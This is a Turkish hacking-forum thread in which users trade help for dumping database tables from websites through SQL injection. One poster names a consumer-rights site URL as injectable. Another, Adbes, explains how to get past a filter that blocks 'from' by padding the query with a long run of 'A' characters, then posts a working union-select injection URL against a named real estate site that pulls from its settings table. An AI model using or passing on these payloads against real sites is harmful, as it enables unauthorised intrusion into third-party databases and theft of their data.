tabloları çekemiyorum ! çekebilene marlboro benden

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
Ik6Kpjvov9i3CfiXdLDbw911r1PNb0oVsGsmW549ZkUMuldshY1hB-M3HBqc1mWgvX70p5JNpGz0BTC61hRjSQ%3D%3D

47 de okunuyor nasıl bekliyorum bi bilsen

🔒 Bu içeriği görmek için giriş yapın

dostum ben dorkları geliştiriyorum kendime göre vs benim derdim basmak değil derdim sunucuya sızma bypass etme başka isteğim yok o yüzden manuel sql yapmaya çalıştım olmadı sağolsun @Adbes reis çekmiş helal olsun benden bi marlboro kazandınız efenim :D
birde çektiğin komutu yazarsan bende bilgilensem iyi olurdu..
tuketicimerkezi.org/basin.php?id=22 buda tuketici hakları merkezi sql injeciton açığı değerlendiren değerlendirsin ben basmıyorum kendimi geliştirmeye çalışıyorum sadece

• A Adbes
dostum ben dorkları geliştiriyorum kendime göre vs benim derdim basmak değil derdim sunucuya sızma bypass etme başka isteğim yok o yüzden manuel sql yapmaya çalıştım olmadı sağolsun @Adbes reis çekmiş helal olsun benden bi marlboro kazandınız efenim :D
birde çektiğin komutu yazarsan bende bilgilensem iyi olurdu..
tuketicimerkezi.org/basin.php?id=22 buda tuketici hakları merkezi sql injeciton açığı değerlendiren değerlendirsin ben basmıyorum kendimi geliştirmeye çalışıyorum sadece
Şöyle kardeşim orada from yazıyorsun 403 veriyor sadece attığım dosyada gördüğün gibi hiç bir waf yapmadım sadece baktım from u engellemiş bellek taşırma ile bu güvenliği aştım bellek taşırma ne dersen o txt dosyasında gördüğün A harfleri :) inşallah istediğin seviyeye ulaşırsın kafana takılan soruları sorarsın pm ile

• A Adbes
http://ekvatoremlaktemizlik.com/emlak.php
?id=-1' union select 1,hizmetler,3,4,5,6,7,8,9,10,11,12,13,14,15 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA FROM ayarlar--+

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
133,738Konular
3,290,084Mesajlar
324,488Kullanıcılar
guraycakirSon Üye
Üst Alt